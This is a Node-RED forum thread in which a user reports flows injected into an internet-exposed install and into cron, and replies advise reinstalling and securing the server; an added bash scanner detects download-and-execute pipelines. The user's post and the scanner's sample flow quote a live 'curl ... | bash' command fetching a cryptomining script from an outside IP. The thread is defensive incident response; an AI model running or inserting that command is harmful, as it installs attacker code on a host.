Have I got a virus in Node-red?

#1

Hi,

I get a lot of new tabs, with 3 things in them:
Timestamp, exec and msg.payload
All new tabs look the same. The exec node has this in it:
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"

Which seems to be cryptomining crap... (I found out after some googling).

It also goes in my cron (running on a ubuntu-server computer).

How do I delete this?
I have tried to clean node red, plus the cron. But after a day it's all back there....
Any ideas?

#2

Short answer: yes

Others have been affected by it this weekend: Missing and mysterious new flows

It comes as a result of you exposing node-red on the internet with no security applied.

Without doing a careful examination of what that script does, the only safe way to be sure is to reinstall the server. And make sure you secure node-red properly before considering exposing it on the internet. If you removed it without securing node-red, there's nothing stopping them from redeploying their flow.
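An added check that is not part of this thread or of Node-RED itself: the injected exec node and the cron entry both use the same download-and-execute shape (`curl ... http://... | bash`), so a regex for that shape finds the flow-level and cron-level persistence together, including variants that swap the URL or use wget. The file locations (~/.node-red/flows*.json, /etc/crontab, /etc/cron.d, /var/spool/cron/crontabs) are the usual defaults and are assumptions here; the sample flow files are constructed for the demonstration. Reading other users' crontabs needs root, and this is a triage aid, not a substitute for the reinstall recommended above.

```shell
#!/usr/bin/env bash
# Added example (not the thread's own code): find "download | shell" pipelines
# in Node-RED flow files and cron entries. Paths below are assumed defaults.

# Print matching lines of one file. Returns 0 on at least one hit, 1 otherwise.
# Pattern: curl or wget, an http(s) URL, then a pipe into sh or bash.
scan_file() {
    grep -nE '(curl|wget)[^|;]*https?://[^|;]*\|[[:space:]]*(ba)?sh' "$1"
}

# Scan the places the thread names as persistence: the Node-RED flow file(s)
# and cron. Returns 0 if anything matched anywhere, 1 if the host looks clean.
scan_host() {
    hit=1
    for f in "$HOME"/.node-red/flows*.json /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue          # unmatched globs stay literal; skip them
        if scan_file "$f"; then
            echo "  ^ in $f"
            hit=0
        fi
    done
    return $hit
}

# Constructed sample flow files (not real artefacts) so the scan runs offline.
TMP=$(mktemp -d)
cat > "$TMP/flows.json" <<'EOF'
[{"id":"a1","type":"exec","command":"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"}]
EOF
cat > "$TMP/clean.json" <<'EOF'
[{"id":"b2","type":"inject","payload":"hello"}]
EOF

# Demonstrate on the constructed files, then on the real locations.
scan_file "$TMP/flows.json" && echo "  ^ infected sample flagged"
scan_file "$TMP/clean.json" || echo "clean sample: no match"
scan_host || echo "host locations: no download-and-execute pipelines found"
```

Run it as the user that owns the Node-RED install (and again as root for the cron directories). A hit in flows.json means the attacker's flow is still deployed; a hit in cron means removing the flow alone will not stop it coming back.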

#3

If I get time, I'll report this to UK CiSP. I'll also see if I can track down the owner of that IP address and see if we can kill it off.

@knolleary, you might want to let the IBM security guys know since Node-RED still has associations with IBM.

Really, it needs someone to kill off that script.

#4

That link tells you what you missed... There is more to it than just clearing node-red and the cron job.

#5

Thanks!
Have deleted those files as well now!

#6

That’s assuming you have identified all the software that has been downloaded.

To be absolutely safe you would need to reformat the hard disk and start again